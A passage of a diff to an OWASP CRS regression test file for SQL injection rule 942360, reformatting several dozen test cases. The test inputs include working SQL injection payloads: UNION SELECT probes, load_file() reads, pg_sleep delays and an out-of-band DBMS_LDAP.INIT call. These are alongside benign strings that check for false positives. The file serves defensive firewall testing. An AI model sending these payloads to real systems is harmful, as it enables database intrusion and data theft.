@@ -1,671 +1,669 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, Franziska Buehler, azurit" - description: None - enabled: true - name: 942360.yaml +rule_id: 942360 tests: - - test_title: 942360-1 + - test_id: 1 desc: "concatenated basic SQL injection and SQLLFI" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # 23423 as "sdfsdfs" FROM table - data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # 23423 as "sdfsdfs" FROM table + data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 2 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "select Char(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "select Char(" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 3 desc: "Detects concatenated basic SQL injection 
and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT CHAR(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT CHAR(" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 4 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT GROUP_CONCAT(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT GROUP_CONCAT(" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 5 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT group_cOnCat(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 
942360-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT group_cOnCat(" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 6 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "select load_file(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "select load_file(" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 7 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "` AS `edit_user_id` from" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "` AS `edit_user_id` from" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 8 desc: "Detects 
concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=%60+REGEXP%20" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=%60+REGEXP%20" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 9 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "` AS `OXTIMESTAMP` from" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "` AS `OXTIMESTAMP` from" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 10 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "(load_file(" - version: HTTP/1.0 - output: - 
log_contains: id "942360" - - test_title: 942360-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "(load_file(" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 11 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "` AS `documentType` FROM" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "` AS `documentType` FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 12 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT load_file(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT load_file(" + version: HTTP/1.0 + output: + log: + expect_ids: 
[942360] + - test_id: 13 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "6 As\" from" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "6 As\" from" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 14 desc: GH issue 1580 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: ", aside from" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-15 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: ", aside from" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 15 desc: GH issue 1605 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "a=/create" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-16 + - input: + dest_addr: 
127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "a=/create" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 16 desc: GH issue 1605 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "a=/CREATE TABLE Persons" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-17 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "a=/CREATE TABLE Persons" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 17 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: " Delete (Trashcan)" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-18 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: " Delete (Trashcan)" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 18 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "5desc" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-19 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "5desc" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 19 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "34-delete" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-20 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "34-delete" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 20 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: " update" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-21 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test 
agent" + method: POST + port: 80 + uri: "/post" + data: " update" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 21 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "/select-quote" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-22 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "/select-quote" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 22 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: " Update: After..." - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-23 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: " Update: After..." 
+ version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 23 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "\"desc\"" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-24 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "\"desc\"" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 24 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "a=/load.php" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-25 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "a=/load.php" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 25 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "a=/update-assets" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-26 + - input: + 
dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "a=/update-assets" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 26 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "bla blabla live update chart" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-27 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "bla blabla live update chart" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 27 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: ".select-gws-banana" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-28 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: ".select-gws-banana" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 28 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "blablabla. As evidence from the following blablabla" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-29 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "blablabla. As evidence from the following blablabla" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 29 desc: GH issue 1816 - Known false positive stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "||(SELECT(DBMS_LDAP.INIT('169.1.1.1',19))FROM(DUAL))/investigate" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-30 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "||(SELECT(DBMS_LDAP.INIT('169.1.1.1',19))FROM(DUAL))/investigate" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 30 desc: GH issue 1816 - Known false positive stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "'||(select(pg_sleep(15))where(true))||'/investigate" - 
version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-31 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "'||(select(pg_sleep(15))where(true))||'/investigate" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 31 desc: GH issue 1816 - Known false positive stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "UNION ALL SELECT NULL,NULL,CONCAT(CONCAT('qqkjq','mxTSrPILRz'),'qvxvq')-- sqCV" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-32 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "UNION ALL SELECT NULL,NULL,CONCAT(CONCAT('qqkjq','mxTSrPILRz'),'qvxvq')-- sqCV" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 32 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "2020-03-01 UNION ALL SELECT CONCAT" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-33 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: 
"OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "2020-03-01 UNION ALL SELECT CONCAT" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 33 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "x\"; SELECT LOAD_FILE('" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-34 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "x\"; SELECT LOAD_FILE('" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 34 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "-1 UNION SELECT null,123456,null,null,null,null--" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-35 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "-1 UNION SELECT null,123456,null,null,null,null--" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 35 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - 
User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "(CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6557=6557" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-36 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "(CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6557=6557" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 36 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: ") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-37 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: ") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 37 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version)" - version: 
